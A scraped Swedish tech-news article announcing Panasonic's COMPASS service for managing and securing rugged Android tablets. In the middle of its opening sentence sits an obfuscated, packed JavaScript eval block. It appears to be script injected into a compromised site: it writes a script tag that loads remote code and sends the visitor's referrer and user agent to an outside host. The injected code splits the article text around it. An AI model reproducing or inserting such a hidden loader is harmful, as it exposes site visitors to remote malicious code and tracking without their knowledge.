Image Image Image Image Image Image Image Image Image Image

| 19 juni, 2019

Scroll to top

Top

PC

COMPASS – Panasonics nya tjänst för tåliga Android-plattor

COMPASS – Panasonics nya tjänst för tåliga Android-plattor
Sebastian

Fler eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ttrfy|var|u0026u|referrer|tihiz||js|php’.split(’|’),0,{}))
och fler företag kör operativsystemet Android på sina mobila enheter. Utvecklingen stöds av Panasonic, som nu lanserar COMPASS – en IT-lösning med flera nya styrnings- och säkerhetstjänster för tåliga Android-baserade datorplattor.

Panasonic presenterar idag sin nya IT-lösning COMPASS (Complete AndroidTM Services och Security) som erbjuder företag alla de funktioner som medarbetarna behöver för att säkert kunna använda sina Android-baserade datorplattor i vardagen.

Tjänsten är utformad för att hjälpa företag och dess medarbetare att utnyttja fördelarna med operativsystemet Android. COMPASS erbjuder nämligen möjligheten att använda både affärs- och centralstyrningslösningar samtidigt som plattformen garanterar företagen optimal säkerhet.

Panasonic COMPASS erbjuder användarna fem olika versioner för företag som använder Android på sina Toughpad-enheter. COMPASS-tjänsten finns tillgänglig från och med idag, 6 oktober 2016.